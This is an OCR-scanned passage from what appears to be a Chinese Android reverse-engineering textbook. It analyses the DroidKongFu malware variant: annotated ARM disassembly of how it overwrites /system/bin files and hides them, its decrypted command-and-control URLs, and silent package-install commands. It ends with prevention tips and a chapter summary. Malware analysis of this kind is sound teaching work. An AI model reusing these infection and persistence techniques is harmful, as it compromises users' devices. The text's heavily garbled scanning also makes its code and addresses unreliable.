RS, 9 ; /data/ .bootemp 
getsysfilectime ;获取 系统 文件 的 最 后 一 次 改变 时 间 
RO, [SP,#0xl8+var_ 14] 
RO, #0 
remountsystem  ; 重新 挂 载 系 统 分 区 为 可 读 写 
RO, #0 ; timer 
time 


RO, [SP,#0xl8+var_18] 
RO, SP, #0xl8+var_14 


settime ; 设置 一 下 时 间 

RO, R4 ; 要 写 入 的 文件 

subIattr ; 去 掉 系 统 属性 好 删除 啊 

RO, R4 ; name 

unlink ; 删除 

sync ; 强制 刷新 

sync 

R6, #0 

loc_BC00 ; /data/ .bootemp 

RO, RS5 

R1, R4 

writefileltofile2 ; 将 /data/ .bootemp 的 内 容 写 入 要 感染 
的 文件 

R1, #0xD2 

RO, R4 ; file 

RLy Rl ‘#1 ; R1 = U644 

chmod ; 设置 为 大 家 都 可 读 写 


; CODE XREF: rewritefile+6C|j 


RO, R4 
addIattr ; 加 上 系统 属性 
RO, SP 
settime ; 再 次 设置 时 间 , 目的 是 不 改变 被 感染 文件 的 最 
后 访问 时 间 
R0O， #1 
remountsystem  ; 重新 挂 载 系统 分 区 为 内 读 
SP, SP, #8 
{RA4-R6, PC} ; 函数 返回 
; CODE XREF: rewritefile+3A1j 
RG RS ; /Gata/ .bootemp 
R1, R4 ; 被 感染 文件 


copyandchangegiq ; 拷贝 文件 并 更 改 用 户 组 ID 
loc_ BBEA 


End of function rewritefile 


站 先是 getsysfilectime()， 它 的 作用 是 获取 系统 文件 /system/bim/rild 或 
者 /systemy/bin/pm 的 最 后 一 次 修改 时 间 ， 病 毒 通过 将 自己 最 后 的 修改 时 间 
设置 与 它们 相同 ， 来 达到 隐藏 自己 不 被 发 现 的 目的 。 接 着 是 
remountsystem()， 它 的 作用 是 重新 挂 载 /system 目 录 为 可 读 可 写 ， 默 认 情 
况 下 Android 系 统 的 /system 目 录 是 只 读 挂 载 的 ， 即 使 是 root 权 限 的 用 户 也 
不 能 修改 该 目录 下 的 文件 ， 因 此 ， 病 毒 在 感染 系统 文件 前 需要 将 其 挂 载 
为 可 读 可 写 。 接 着 是 subIattrO0 与 unlink0， 前 者 去 除 系统 文 
件 /system/bin/svc 不 可 删除 的 属性 ， 后 者 则 执行 文件 删除 操作 。 当 上 面 
的 操作 执行 完 后 ， 执 行 writefileltofile2() 完 成 病毒 写 文 件 操 作 ， 它 的 作用 
就 是 将 /data/.bootemp 的 内 容 复 制 一 份 保存 为 要 感染 的 文件 ， 通 过 
writefileltofile2(0) 函 数 尖 部 的 交叉 引用 可 以 看 到 ， 它 在 病毒 程序 中 被 两 次 
调用 ， 一 次 是 用 来 感染 /system/bin/svc， 男 一 次 则 是 用 来 感 
染 /system/build.prop。 感 染 完 成 后 调用 chmod0) 修 改 其 属性 为 644， 接 着 
调用 addIattr(0) 为 文件 添加 不 可 有 删除 属性 ， 随 后 调用 settime() 设 置 文件 最 
后 修改 时 间 ， 它 实际 上 是 调用 gettimeofday( 与 settimeofday0 来 完成 的 。 
最 后 ， 代 码 调用 了 remountsystem() 重 新 恢复 /system 目 录 为 只 读 。 至 
此 ，/system/bin/svc 的 感染 过 程 就 完了 。 另 外 ， 代 人 码 中 还 有 一 个 
copyandchangegid 0 函数， 只 有 当 R2 寄 存 器 传递 进来 的 第 3 个 参数 不 为 0 
时 它 才 会 被 执行 ， 此 处 传递 进来 的 值 为 0， 因 此 它 不 会 被 执行 。 它 的 作 
用 也 是 感染 文件 ， 但 不 同 的 是 ， 它 调用 chmodO 修 改 的 属性 为 755， 并 且 
还 会 调用 chown() 更 改 文件 所 有 者 。 

感染 /System/bin/svc 的 函数 infectsvcO 只 是 系统 感染 函数 infectsysfile() 
的 一 小 部 分 。infectsysfile() 会 多 次 判断 /systemvlib/libd1.so 是 否 可 以 访 
问 ， 接 着 病毒 会 根据 不 同 地 方 的 判断 结果 ， 感 染 其 它 系 统 文件 。 在 这 之 
前 病毒 会 先 调 用 copy2frameworkdir() 备 份 /system/bin/vold 
与 /system/bin/debuggerd 文 件 到 /system/framework 目 录 下 ， 也 就 是 前 面 演 
示 的 evil.strace 文 件 的 内 容 片 断 。infectsysfile0 函 数 接 下 来 会 感染 几 个 系 



































统 中 重要 的 文件 。 这 些 文件 在 病毒 本 体 的 .data.rel.ro 段 中 通过 
INFECT_FEFILS 变 量 指出 ， 如 图 12-11 所 示 。 


-data.rel .ro:08008EBS80 ; ”Unknown” 

-data.rel.ro:8888EB84 INFECT_FEILS DCD FILE CHD_1 ; DATA XREF: checkrun+28To 
-data.rel.ro:88060EBS4 ; .text:off BA68To ... 

-data.rel .ro: 686006EB84 ; Decrypted ualue: rm 
-data.rel.ro:88868EB88 DCD FILE_ CHD 2 ; Decrypted value: move 

-data.rel .ro: 080688EBSC DCD FILE_CHD_ 3 ; Decrypted value: mount 
-data.rel.ro:8868EB96 DCD FILE_CHD 4 ; Decrypted value: ifconfig 
-data.rel.ro:8868EB94 DED FILE CHD 5 ; Decrypted value: chown 
-data.rel.ro:8688EB98 DCD FILE CHD 6 ; Decrypted ualue: debuggerd 
-data-rel-r0:09969EB9C DCD FILE_CMHD_7 ; Decrypted ualue: vold 

-data.rel .ro:8888EBAG DCD FILE CHD 9 ; Decrypted value: dhcpcd 

-data.rel .ro:80886EBAL DCD FILE CHD_18 ; Decrypted value: installd 
-data-rel-r0:0969EBh8 DCD ThRGET_CHD_1 ; Decrypted ualue: /system/bin/rm 
-data.rel.ro:8808EBAC DED TARGET_CHD 2 ; Decrypted value: jsystem/bin/move 
-data.rel.ro:88868EBBS DCD TARGET_CHD 3 ; Decrypted ualue: /system/bin/mount 
-data.rel .ro:8880EBB4 DCD TARGET_CHD 4 ; Decrypted value: /system/bin/ifconfig 
-data.rel .ro:80800EBBS DED TARGET_CHD 5 ; Decrypted value: /system/bin/;chown 





图 12-11 需要 感染 的 系统 文件 


感染 操作 是 通过 rewritefile() 函 数 完成 的 ， 这 个 函数 前 面 已 经 分 析 过 
了 ， 其 作用 就 是 一 个 文件 复制 的 过 程 。 这 次 感染 的 方法 是 使 用 病毒 主体 
文件 来 蔡 换 这 些 系统 文件 ， 病 毒 主 体 文 件 大 小 为 27036 字 节 ， 因 此 病毒 
感染 系统 后 ， 可 以 在 DDMS 中 查找 /systemybin 目 录 下 与 病毒 本 体 文件 大 
小 相同 的 文件 ， 来 判断 哪些 系统 文件 被 成 功 感染 。 笔 者 在 终端 提示 符 下 
执行 命令 “adb shell ls -Isystemybin |grep 27036” 后 输出 结果 如 图 12-12 所 
修 o 


一 








feicong@feicong-ubuntu12: ~ 


feicong@feicong-ubuntuyui2;~$ adb shell ls -1 /system/bin |grep 27036 
-frTWXr -Xr-X root shell 2011-02-04 866:50 chown 
-rwxr-xr-Xx root shell 2011-02-04 06: ifconfig 
-TWXrT -Xr-Xx root 1 2011-62-64 66: mount 
-TWXr-Xxr-X root shell 2011-02-04 06: move 

-TWXrT -XrF-xXx root shell PAS Ey Eo pA 96 : rm 
feicong@feicong-ubuntyu12:~$ 四 


图 12-12 ”被 感染 的 系统 文件 





现在 读者 应 该 明白 为 什么 要 往 /system/bin/svc 文 件 中 写 入 字符 
串 “/system/bin/ifconfig”? 了 吧 。svc 文 件 是 Android 服 务 框架 的 启动 脚本 ， 
当 Android 系 统 局 动 时 该 脚本 被 会 调用 ， 这 样 /system/bin/ifconfig 束 会 在 


开机 时 神 不 知 鬼 不 觉 地 被 执行 了 ， 病 毒 通 过 这 一 行 简单 的 代码 就 实现 了 
开机 启动 。 

4. 获取 远程 指令 

感染 系统 完成 后 ， 病 毒 开始 获取 系统 硬件 信息 ， 然 后 连接 远程 的 服 
务 器 。 使 用 init_predata 0) 函数 解密 字符 串 后 ， 可 以 发 现 病毒 共有 如 下 3 个 
服务 嚣 地址: 


http://ad.pandanew.com:8511/search/ 











http://ad.phonego8.com:8511/search/ 

http://ad.my968.com:8511/search/ 

以 及 s1.php、s2.php 与 s3.php 共 3 个 请 求 的 文件 。 使 用 本 机 的 telnet 命 
令 去 连接 以 上 3 个 网 址 的 8511 端 口 ， 发 现 已 经 无 法 连通 了 ， 因 此 ， 我 们 
无 法 通过 分 析 得 知 当 初 这 些 网 址 反馈 给 DroidKongFu 变 种 病毒 哪些 信 
自 


5. 执行 控制 命令 
在 解密 出 的 字符 串 中 ， 有 如 下 几 个 字符 串 值 得 注意 : 


AM_START: /system/bin/am start -a android.intent.action.VIEW -d 





START_APP: /system/bin/am start -n 
PM_INSTALL: /system/bin/pm install -r 
PM_ UNINSTALL: /system/bin/pm uninstall 


解密 出 的 AM_START 字 符 串 可 以 看 作 是 要 执行 的 命令 ， 其 作用 是 
通过 命令 行 的 方式 启动 一 个 Activity， 而 START_APP 则 是 启动 一 个 
Android 组 件 。 通 过 IDA Pro 的 交叉 引用 ， 可 以 找到 START_APP 在 main() 
函数 中 被 调用 过 ， 部 分 代码 如 下 : 


.text:0000CA48 runamstart ; CODE XREF: main:AM START|p 
.text:0000CA48 


.text:0000CA48 s = -0x214 

.text:0000CA48 var_14 = =0x14 

.text:0000CA64 BLX memset 

.text:0000CA68 BL write.rsid_log ;这 个 函数 调用 返回 要 启动 的 组 件 

.七 eXt:0000CRA6C SUBS | 

.text:0000CA6E BEQ return 

.text:0000CA70 LDR R1，=(aSS_ 2 - OxCA7A) 

.text:0000CA72 LDR R2，=(START APP ptr - 0xECB8) 

.text:0000CA74 MOVS RRO. B53 要 

.text:0000CA76 ADD ‘be ER 2 YS: Sa" 

.text:0000CA78 LDR | ; Decrypted value: /system/bin/am 
start -n 

.text:0000CA7A BLX sprintf 

‘text:0000CATE MOVS RO 3 ; Command 

.text:0000CA80 BLX system ; 通过 am start 方 式 启动 ndroid 程 友 的 组 件 


.text:0000CA84 


text:0000CA94 POP {R4-R6, PC} ; 函数 返回 


在 使 用 AM_START 启 动 一 个 组 件 前 ， 调 用 了 writersid_log0 函 数 ， 
这 个 函数 的 作用 是 将 要 启动 的 组 件 写 入 /data/local/tmp/.rsid_log 文 件 ， 并 
返回 需要 启动 的 组 件 名 (因为 无 法 获取 服务 器 指令 ，runamstart 标 号 处 
的 代码 将 不 会 被 执行 ， 文 件 的 内 容 也 就 不 得 而 知 了 ， 此 处 的 结论 是 笔者 
猜测 而 来 的 ) 。 

PM_INSTALL 与 PM_UNINSTALL 用 于 静默 安装 或 卸载 软件 包 ， 在 
病毒 代码 中 没有 发 现 其 直接 调用 的 代码 ， 但 可 以 肯定 的 是 ， 这 两 个 字符 
串 的 存在 一 定 是 为 了 偷偷 地 同 用 户 的 手机 中 安装 与 彼 载 广告 或 木马 软 
件 。 

静态 分 析 病 毒 主体 的 代码 比较 累 人 ， 加 上 无 法 获取 到 需要 执行 的 指 
令 ， 对 DroidKongFu 变 种 病毒 的 分 析 到 这 里 就 算 结束 了 ， 详 细 的 注释 读 
者 可 以 使 用 IDA Pro 导 入 本 书 配 套 源 代码 中 本 小 市 的 evil.idc 进 行 查看 。 


12.5 “DroidKongFu 病 毒 框架 总 结 


通过 上 面 的 分 析 ， 我 们 已 经 了 解 了 DroidKongFu 变 种 病毒 所 有 的 执 
行 流程 。 为 了 方便 读者 理解 ， 笔 者 画 了 一 张 病毒 执行 流程 图 辅助 读者 分 
析 ， 如 图 12-13 所 示 。 





MainActivity 的 OnCreate() 方 法 Java 局 动 屋 
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图 12-13 ”DroidKongFu 变 种 病毒 执行 流程 图 


12.6 ”病毒 防治 


病毒 程序 未 经 用 户 同意 ， 恶 意 的 下 载 广告 软件 、 发 送 扣 费 短信 、 上 
传 用 户 隐私 数据 ， 给 用 户 带 来 巨大 的 经 济 损失 。 如 何 有 效 地 防治 病毒 ， 
已 经 成 为 Android 手 机 用 户 必 须 掌 握 的 知识 。 笔 者 在 此 提出 几 点 建议 : 

1. 不 要 轻易 ROOT 自己 的 手机 。 

root 权 限 对 于 软件 来 说 ， 拥 有 系统 绝对 的 控制 权 。 这 种 情况 下 ， 手 
机 中 所 有 的 数据 都 是 暴露 的 ， 任 何 程序 都 可 以 访问 系统 中 所 有 的 数据 ， 
病毒 程序 更 会 在 这 种 情况 下 对 系统 进行 肆意 的 破坏 。 

2. 到 正规 的 应 用 商店 下 载 软件 

Android 系 统 的 开放 性 造就 了 国内 的 Android 软 件 市 场 ， 据 不 完全 统 
计 ， 国 内 的 Android 软 件 市 场 已 有 上 百 家 ， 这 些 市 场 中 提供 的 软件 名 目 
繁多 ， 质 量 参差 不 齐 ， 其 中 就 不 乏 一 些 病毒 软件 充斥 其 中 ， 用 户 很 难 通 
过 软件 名 来 判断 是 否 为 恶意 程序 ， 安 装 这 些 软件 随时 面临 着 手机 中 毒 的 
危险 ， 因 此， 笔者 建议 下 载 软件 时 最 好 先 去 Google Play 商店 找 找 ， 如 果 
没有 ， 可 以 尝试 搜索 软件 的 官方 网 站 ， 最 后 实在 找 不 到 就 去 国内 知名 度 
较 高 的 Android 市 场 下 载 ， 这 样 可 以 大 大 降低 手机 中 毒 的 几率 。 

3. 安装 软件 留心 眼 

手动 安装 软件 时 ， 安 装 界面 会 显示 将 要 安装 的 软件 使 用 到 的 权限 ， 
这 些 权 限 中 一 部 分 就 是 和 手机 扣 费 相关 的 ， 在 安装 时 需要 留 个 心眼 。 比 
如 ， 下 载 安 装 一 个 新 闻 阅 读 软 件 ， 里 面 却 使 用 到 了 短信 发 送 的 权限 ， 这 
很 显然 是 不 合理 的 ， 这 个 时 候 就 需要 谨慎 了 ， 可 以 选择 放弃 安装 ， 或 者 
上 传 到 在 线 沙 盒 中 测试 一 下 ， 当 然 ， 也 可 以 使 用 本 书 讲 到 的 技术 来 反 编 
译 该 软件 ， 看 看 是 否 有 亚 意 发 送 扣 费 短信 的 行为 。 

4. 安装 防 病毒 软件 

防 病毒 软件 是 手机 安全 的 最 后 一 道 屏障 。 虽 然 不 指望 这 些 软件 能 够 


















































对 未 知 的 病毒 进行 预警 ， 但 它们 中 的 大 部 分 还 是 可 以 碍 杀 已 知 病毒 的 ， 
并 且 ， 一 些 防 病毒 软件 还 提供 了 系统 敏感 数据 的 监控 功能 ， 可 以 及 时 地 
对 系统 中 的 危险 操作 进行 提醒 。 另 外 ， 如 果 您 使 用 的 手机 已 经 ROOT 过 
了 ， 那 么 最 好 安装 融 主 动 防御 功能 的 防 病毒 软件 ， 这 样 才能 捕获 那些 比 
较 底 层 且 难以 发 现 的 恶意 攻击 。 


12.7 本 章 小 结 


本 章 是 本 书 的 最 后 一 章 ， 也 是 知识 总 结 的 一 章 。 本 章 主 要 通过 分 析 
DroidKongFu 变 种 病毒 从 Java 层 代码 到 Native 层 代码 的 整个 执行 过 程 ， 融 
会 贯通 全 书 涉及 到 的 知识 点 。 

12.4.1 市 讲解 的 Java 层 启动 代码 分 析 ， 主 要 是 针对 本 书 一 至 五 章 的 
内 容 。 分 析 Java 程 序 的 反 汇 编 代 码 是 研究 Android 软 件 安全 的 基础 知识 ， 
读者 在 使 用 jd-gui 来 阅读 反 编 译 出 的 Java 代 码 前 ， 需 要 多 阅读 反 汇 编 出 的 
smali 代 码 ， 理 解 它 们 的 含义 ， 养 成 多 读 、 多 练 的 好 习惯 。12.4.2 市 与 
12.4.3 节 主要 讲解 的 是 ARM 反 汇编 代码 的 阅读 ， 主 要 是 针对 本 书 第 六 章 
至 八 章 的 内 容 。 阅 读 ARM 肥 汇编 代码 是 本 书 的 难点 ， 也 是 本 书 的 重 
点 ，ARM 反 汇编 代码 的 阅读 能 力 直接 决定 了 分 析 人 员 逆 同 分 析 的 水 
平 。 要 想 提 高 自己 的 分 析 水 平 ， 没 有 捷径 可 走 ， 除 了 对 编程 知识 的 了 解 
外 ， 更 多 的 就 是 多 动手 分 析 实 例 程 序 ， 多 阅读 反 汇 编 代 码 。 

最 后 ， 真 心 希望 读者 能 够 通过 本 书 学 习 到 想 要 了 解 的 知识 ， 读 者 在 
阅读 本 书 过 程 中 ， 有 任何 的 疑问 ， 或 发 现 书 中 有 描述 错误 的 地 方 ， 欢 迎 
来 信 ， 笔 者 的 邮箱 是 fei_cong@hotmail.com。 

















